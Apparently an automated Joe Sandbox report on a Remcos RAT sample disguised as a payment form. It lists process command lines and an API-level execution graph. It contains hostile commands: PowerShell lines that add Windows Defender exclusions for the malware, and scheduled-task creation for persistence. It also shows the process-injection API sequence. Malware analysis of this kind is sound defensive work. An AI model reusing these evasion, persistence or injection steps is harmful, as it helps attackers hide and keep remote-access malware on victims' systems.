                                            Commandline:"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0xc50000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:14
                                            Start time:02:23:39
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:15
                                            Start time:02:23:39
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\ProgramData\AppUpdate\remcos.exe
                                            Imagebase:0xa00000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 53%, ReversingLabs
                                            • Detection: 61%, Virustotal, Browse
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:16
                                            Start time:02:23:45
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0x220000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:17
                                            Start time:02:23:45
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:18
                                            Start time:02:23:45
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
                                            Imagebase:0x220000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:19
                                            Start time:02:23:45
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:20
                                            Start time:02:23:45
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpAC9A.tmp"
                                            Imagebase:0x7e0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:21
                                            Start time:02:23:46
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:23
                                            Start time:02:23:46
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0xe60000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Has exited:false

                                            General

                                            Target ID:24
                                            Start time:02:23:48
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0xc20000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:26
                                            Start time:02:23:54
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCD42.tmp"
                                            Imagebase:0x7e0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:27
                                            Start time:02:23:54
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:28
                                            Start time:02:23:54
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0xb10000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.1574639451.000000000117A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Has exited:true

                                            General

                                            Target ID:29
                                            Start time:02:23:56
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0xb20000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:30
                                            Start time:02:24:02
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpED6C.tmp"
                                            Imagebase:0x7e0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:31
                                            Start time:02:24:02
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:32
                                            Start time:02:24:02
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0x510000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.1656887776.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Has exited:true

                                            General

                                            Target ID:33
                                            Start time:02:24:04
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0xa80000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:34
                                            Start time:02:24:10
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCDB.tmp"
                                            Imagebase:0x7e0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:35
                                            Start time:02:24:10
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:36
                                            Start time:02:24:10
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0x650000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:11%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:121
                                              Total number of Limit Nodes:2
                                              execution_graph 22763 260cfa0 22764 260cfe6 22763->22764 22768 260d588 22764->22768 22771 260d57b 22764->22771 22765 260d0d3 22769 260d5b6 22768->22769 22774 260d1dc 22768->22774 22769->22765 22772 260d1dc DuplicateHandle 22771->22772 22773 260d5b6 22772->22773 22773->22765 22775 260d5f0 DuplicateHandle 22774->22775 22776 260d686 22775->22776 22776->22769 22923 6a98079 22926 6a97edc 22923->22926 22924 6a981b4 22925 6a9a9a0 12 API calls 22925->22924 22926->22924 22926->22925 22777 2604668 22778 2604672 22777->22778 22780 2604763 22777->22780 22781 260477d 22780->22781 22785 2604868 22781->22785 22789 2604863 22781->22789 22786 260488f 22785->22786 22788 260496c 22786->22788 22793 26044b4 22786->22793 22791 260488f 22789->22791 22790 260496c 22790->22790 22791->22790 22792 26044b4 CreateActCtxA 22791->22792 22792->22790 22794 26058f8 CreateActCtxA 22793->22794 22796 26059bb 22794->22796 22927 260aef8 22928 260af40 GetModuleHandleW 22927->22928 22929 260af3a 22927->22929 22930 260af6d 22928->22930 22929->22928 22797 6a9bc20 22798 6a9bdab 22797->22798 22799 6a9bc46 22797->22799 22799->22798 22801 6a94460 22799->22801 22802 6a9bea0 PostMessageW 22801->22802 22803 6a9bf0c 22802->22803 22803->22799 22804 6a98200 22805 6a98180 22804->22805 22808 6a9a9a0 22805->22808 22806 6a982b3 22809 6a9a9ba 22808->22809 22821 6a9a9c2 22809->22821 22822 6a9b467 22809->22822 22827 6a9afc7 22809->22827 22832 6a9b045 22809->22832 22837 6a9b025 22809->22837 22842 6a9b100 22809->22842 22847 6a9ae61 22809->22847 22852 6a9af6d 22809->22852 22857 6a9b1bc 22809->22857 22861 6a9b6bc 22809->22861 22866 6a9b0bd 22809->22866 22871 6a9aee6 22809->22871 22821->22806 22823 6a9b48a 22822->22823 22875 6a971b8 22823->22875 22879 6a971b7 22823->22879 22824 6a9b49f 22824->22821 22828 6a9b08a 22827->22828 22883 6a97778 22828->22883 22887 6a97770 22828->22887 22829 6a9b0a8 22833 6a9b04b 22832->22833 22891 6a97928 22833->22891 22895 6a97921 22833->22895 22834 6a9af4a 22838 6a9b02b 22837->22838 22899 6a97838 22838->22899 22903 6a97830 22838->22903 22839 6a9b31f 22843 6a9b04c 22842->22843 22844 6a9af4a 22842->22844 22843->22844 22845 6a97928 ReadProcessMemory 22843->22845 22846 6a97921 ReadProcessMemory 22843->22846 22844->22844 22845->22844 22846->22844 22848 6a9ae74 22847->22848 22907 6a97ab9 22848->22907 22911 6a97ac0 22848->22911 22853 6a9af7a 22852->22853 22855 6a97838 WriteProcessMemory 22853->22855 22856 6a97830 WriteProcessMemory 22853->22856 22854 6a9aecd 22855->22854 22856->22854 22915 6a97698 22857->22915 22919 6a976a0 22857->22919 22858 6a9b1d6 22862 6a9b7f1 22861->22862 22864 6a97698 Wow64SetThreadContext 22862->22864 22865 6a976a0 Wow64SetThreadContext 22862->22865 22863 6a9b80c 22864->22863 22865->22863 22867 6a9b0ca 22866->22867 22869 6a971b8 ResumeThread 22867->22869 22870 6a971b7 ResumeThread 22867->22870 22868 6a9b49f 22868->22821 22869->22868 22870->22868 22873 6a97838 WriteProcessMemory 22871->22873 22874 6a97830 WriteProcessMemory 22871->22874 22872 6a9af14 22872->22821 22873->22872 22874->22872 22876 6a971f8 ResumeThread 22875->22876 22878 6a97229 22876->22878 22878->22824 22880 6a971f8 ResumeThread 22879->22880 22882 6a97229 22880->22882 22882->22824 22884 6a977b8 VirtualAllocEx 22883->22884 22886 6a977f5 22884->22886 22886->22829 22888 6a977b8 VirtualAllocEx 22887->22888 22890 6a977f5 22888->22890 22890->22829 22892 6a97973 ReadProcessMemory 22891->22892 22894 6a979b7 22892->22894 22894->22834 22896 6a97973 ReadProcessMemory 22895->22896 22898 6a979b7 22896->22898 22898->22834 22900 6a97880 WriteProcessMemory 22899->22900 22902 6a978d7 22900->22902 22902->22839 22904 6a97880 WriteProcessMemory 22903->22904 22906 6a978d7 22904->22906 22906->22839 22908 6a97b49 CreateProcessA 22907->22908 22910 6a97d0b 22908->22910 22910->22910 22912 6a97b49 CreateProcessA 22911->22912 22914 6a97d0b 22912->22914 22914->22914 22916 6a976e5 Wow64SetThreadContext 22915->22916 22918 6a9772d 22916->22918 22918->22858 22920 6a976e5 Wow64SetThreadContext 22919->22920 22922 6a9772d 22920->22922 22922->22858

                                              Executed Functions

                                              Function 06A9CB08 Relevance: .6, Instructions: 617COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 05d45f4c6cfbc1fe22838d26d07a65d81395818babd47ddec56ea11aa682a1cf
                                              • Instruction ID: b7030ef46424ec25e38df1ec249ac14dc771bbaf36f59ccdea3b7b79b92ac14d
                                              • Opcode Fuzzy Hash: 05d45f4c6cfbc1fe22838d26d07a65d81395818babd47ddec56ea11aa682a1cf
                                              • Instruction Fuzzy Hash: 2B328C31B016048FDB59EBA5C590BAEBBF7AF89710F248469E146DB390CB35ED01CB61
                                              Function 06A9B437 Relevance: .0, Instructions: 8COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4cf39f35dabfc75af0301a18481e14170dc8ed526dc75d267ebd61ff88e81c75
                                              • Instruction ID: 284d32f6ca6f2a1dae14b2c2005902684426267776f88c5a488599cfb9c29988
                                              • Opcode Fuzzy Hash: 4cf39f35dabfc75af0301a18481e14170dc8ed526dc75d267ebd61ff88e81c75
                                              • Instruction Fuzzy Hash: AFA00220DDF0128EAFC83C6819000F6D0FC430F408D317801517B770021504C11400BC
                                              Function 06A97AC0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 6a97ac0-6a97b55 2 6a97b8e-6a97bae 0->2 3 6a97b57-6a97b61 0->3 10 6a97bb0-6a97bba 2->10 11 6a97be7-6a97c16 2->11 3->2 4 6a97b63-6a97b65 3->4 5 6a97b88-6a97b8b 4->5 6 6a97b67-6a97b71 4->6 5->2 8 6a97b73 6->8 9 6a97b75-6a97b84 6->9 8->9 9->9 12 6a97b86 9->12 10->11 13 6a97bbc-6a97bbe 10->13 17 6a97c18-6a97c22 11->17 18 6a97c4f-6a97d09 CreateProcessA 11->18 12->5 15 6a97be1-6a97be4 13->15 16 6a97bc0-6a97bca 13->16 15->11 19 6a97bcc 16->19 20 6a97bce-6a97bdd 16->20 17->18 21 6a97c24-6a97c26 17->21 31 6a97d0b-6a97d11 18->31 32 6a97d12-6a97d98 18->32 19->20 20->20 22 6a97bdf 20->22 23 6a97c49-6a97c4c 21->23 24 6a97c28-6a97c32 21->24 22->15 23->18 26 6a97c34 24->26 27 6a97c36-6a97c45 24->27 26->27 27->27 28 6a97c47 27->28 28->23 31->32 42 6a97da8-6a97dac 32->42 43 6a97d9a-6a97d9e 32->43 45 6a97dbc-6a97dc0 42->45 46 6a97dae-6a97db2 42->46 43->42 44 6a97da0 43->44 44->42 48 6a97dd0-6a97dd4 45->48 49 6a97dc2-6a97dc6 45->49 46->45 47 6a97db4 46->47 47->45 51 6a97de6-6a97ded 48->51 52 6a97dd6-6a97ddc 48->52 49->48 50 6a97dc8 49->50 50->48 53 6a97def-6a97dfe 51->53 54 6a97e04 51->54 52->51 53->54 56 6a97e05 54->56 56->56
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A97CF6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 44769dd0510229330d7ba417011a914077f9f1b10f8859e2300621b34c9d904a
                                              • Instruction ID: 7d972086231bcc8ef3c52cefaa317eb9b626c9b3aaf2512fd6c8104d376a7d11
                                              • Opcode Fuzzy Hash: 44769dd0510229330d7ba417011a914077f9f1b10f8859e2300621b34c9d904a
                                              • Instruction Fuzzy Hash: DC913871D102198FEF64DF69C8407EEBBF2AF44314F248569D809A7240DB759985CFA1
                                              Function 06A97AB9 Relevance: 1.7, APIs: 1, Instructions: 242processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 57 6a97ab9-6a97b55 59 6a97b8e-6a97bae 57->59 60 6a97b57-6a97b61 57->60 67 6a97bb0-6a97bba 59->67 68 6a97be7-6a97c16 59->68 60->59 61 6a97b63-6a97b65 60->61 62 6a97b88-6a97b8b 61->62 63 6a97b67-6a97b71 61->63 62->59 65 6a97b73 63->65 66 6a97b75-6a97b84 63->66 65->66 66->66 69 6a97b86 66->69 67->68 70 6a97bbc-6a97bbe 67->70 74 6a97c18-6a97c22 68->74 75 6a97c4f-6a97d09 CreateProcessA 68->75 69->62 72 6a97be1-6a97be4 70->72 73 6a97bc0-6a97bca 70->73 72->68 76 6a97bcc 73->76 77 6a97bce-6a97bdd 73->77 74->75 78 6a97c24-6a97c26 74->78 88 6a97d0b-6a97d11 75->88 89 6a97d12-6a97d98 75->89 76->77 77->77 79 6a97bdf 77->79 80 6a97c49-6a97c4c 78->80 81 6a97c28-6a97c32 78->81 79->72 80->75 83 6a97c34 81->83 84 6a97c36-6a97c45 81->84 83->84 84->84 85 6a97c47 84->85 85->80 88->89 99 6a97da8-6a97dac 89->99 100 6a97d9a-6a97d9e 89->100 102 6a97dbc-6a97dc0 99->102 103 6a97dae-6a97db2 99->103 100->99 101 6a97da0 100->101 101->99 105 6a97dd0-6a97dd4 102->105 106 6a97dc2-6a97dc6 102->106 103->102 104 6a97db4 103->104 104->102 108 6a97de6-6a97ded 105->108 109 6a97dd6-6a97ddc 105->109 106->105 107 6a97dc8 106->107 107->105 110 6a97def-6a97dfe 108->110 111 6a97e04 108->111 109->108 110->111 113 6a97e05 111->113 113->113
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A97CF6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: e398c4eb94ee2e9a37367a055c9204817e49799793742842c7f4babff9542320
                                              • Instruction ID: 1e7e37d51b0b3615c7767781c942c50c60fd05d97eb3bad0baa6eca279e90426
                                              • Opcode Fuzzy Hash: e398c4eb94ee2e9a37367a055c9204817e49799793742842c7f4babff9542320
                                              • Instruction Fuzzy Hash: 9F912871D102198FEF64DF68C8817EEBBF2BF44314F2485A9D809AB240DB759985CFA1
                                              Function 026044B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 114 26044b4-26059b9 CreateActCtxA 117 26059c2-2605a1c 114->117 118 26059bb-26059c1 114->118 125 2605a2b-2605a2f 117->125 126 2605a1e-2605a21 117->126 118->117 127 2605a40-2605a70 125->127 128 2605a31-2605a3d 125->128 126->125 132 2605a22-2605a27 127->132 133 2605a72-2605af4 127->133 128->127 132->125
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 026059A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: f1ea635971da1e8961882565cedef21ea56a667e8bc77c8091bbbe920a2d5fe1
                                              • Instruction ID: 89646a71d2c221e3ad5fbaf191395f5ea8b456f5eadbcfc1a9f7cf077dd9f432
                                              • Opcode Fuzzy Hash: f1ea635971da1e8961882565cedef21ea56a667e8bc77c8091bbbe920a2d5fe1
                                              • Instruction Fuzzy Hash: 6F41D470D00719CFEB24CFAAC9847CEBBB5BF89304F60806AD419AB255DB756945CF90
                                              Function 026058F3 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 136 26058f3-26059b9 CreateActCtxA 138 26059c2-2605a1c 136->138 139 26059bb-26059c1 136->139 146 2605a2b-2605a2f 138->146 147 2605a1e-2605a21 138->147 139->138 148 2605a40-2605a70 146->148 149 2605a31-2605a3d 146->149 147->146 153 2605a22-2605a27 148->153 154 2605a72-2605af4 148->154 149->148 153->146
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 026059A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: e257f9b9407eb41eb2da36ca37751e2877430272eb893ec03edc384180d7a389
                                              • Instruction ID: 896c63a74990e9371da6e040ba56c4df7a46ccfe6b7ad4219837ac847f572960
                                              • Opcode Fuzzy Hash: e257f9b9407eb41eb2da36ca37751e2877430272eb893ec03edc384180d7a389
                                              • Instruction Fuzzy Hash: F041C2B0D00719CFEB24CFA9C9847CEBBB2BF89304F60806AD419AB255DB756949CF50
                                              Function 06A97838 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 167 6a97838-6a97886 169 6a97888-6a97894 167->169 170 6a97896-6a978d5 WriteProcessMemory 167->170 169->170 172 6a978de-6a9790e 170->172 173 6a978d7-6a978dd 170->173 173->172
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A978C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: f3e2fbcc3e45ff68f93266b89fa7c14682059710fdbb313ed916cd958bc08031
                                              • Instruction ID: f887d1f9bf31243fb55867d3dfb81ec292395c7271c4cfd91bfb8a8a5853c851
                                              • Opcode Fuzzy Hash: f3e2fbcc3e45ff68f93266b89fa7c14682059710fdbb313ed916cd958bc08031
                                              • Instruction Fuzzy Hash: 512126729103499FDF10DFA9C885BEEBBF5FF48310F14842AE958A7240D7799944CBA0
                                              Function 06A97830 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 157 6a97830-6a97886 159 6a97888-6a97894 157->159 160 6a97896-6a978d5 WriteProcessMemory 157->160 159->160 162 6a978de-6a9790e 160->162 163 6a978d7-6a978dd 160->163 163->162
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A978C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: be9ed1f05deb3a8682e0b2ba776a94a6584338c33331281acec222f5c86eac4e
                                              • Instruction ID: 4403f55316aaa015ebb83a875a224e0f10f5d4628e9820c2dad05440fea36bac
                                              • Opcode Fuzzy Hash: be9ed1f05deb3a8682e0b2ba776a94a6584338c33331281acec222f5c86eac4e
                                              • Instruction Fuzzy Hash: FA2135B6900309DFDB00DFA9C985BEEBBF1FF48310F14842AE918A7240D7789944CBA0
                                              Function 0260D1DC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 177 260d1dc-260d684 DuplicateHandle 179 260d686-260d68c 177->179 180 260d68d-260d6aa 177->180 179->180
                                              APIs
